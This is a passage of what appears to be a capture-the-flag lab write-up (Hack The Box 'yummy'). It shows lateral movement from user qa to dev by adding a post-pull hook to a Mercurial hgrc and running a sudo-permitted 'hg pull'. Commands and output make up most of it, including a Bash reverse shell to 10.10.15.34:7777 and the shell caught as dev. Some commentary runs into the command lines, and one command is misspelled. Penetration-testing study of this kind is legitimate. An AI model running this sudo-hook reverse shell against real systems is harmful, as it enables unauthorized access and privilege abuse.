dev
The current user, qa, has a sudo privilege to execute /usr/bin/hg pull /home/dev/app-production/ as the dev user.
qa@yummy:/dev/shm$ rm -rf .hg/*Removing the previously pulled data
qa@yummy:/dev/shm$ cp ~/.hgrc .hg/hgrcCopying the existing hgrc file to the .hg directory
qa@yummy:/dev/shm$ echo -e '#!/bin/bash\nbash -i >& /dev/tcp/10.10.15.34/7777 0>&1' > post-pull-shell.sh
qa@yummy:/dev/shm$ chmod 777 ./post-pull-shell.sh I will then create a Bash reverse shell file; post-pull-shell.sh
I will then edit the copied .hg/hgrc file to include a hook, post-pull, to execute the Bash reverse shell file
qa@yummy:/dev/shm$ sudo -u dev /usr/bin/hg pull /home/dev/app-production/
pulling from /home/dev/app-production/
requesting all changes
adding changesets
adding manifests
adding file changes
added 6 changesets with 129 changes to 124 files
new changesets f54c91c7fae8:6c59496d5251
(run 'hg update' to get a working copy)Then, executing the sudo privileged-command
┌──(kali㉿kali)-[~/archive/htb/labs/yummy]
└─$ nnc 7777
listening on [any] 7777 ...
connect to [10.10.15.34] from (UNKNOWN) [10.129.54.224] 52480
I'm out of office until October 8th, don't call me
dev@yummy:/dev/shm$ whoami
dev
dev@yummy:/dev/shm$ hostname
yummy
dev@yummy:/dev/shm$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:94:6e:41 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.129.54.224/16 brd 10.129.255.255 scope global dynamic eth0
valid_lft 3095sec preferred_lft 3095secLateral Movement made to the dev user via exploiting the sudo privileged-command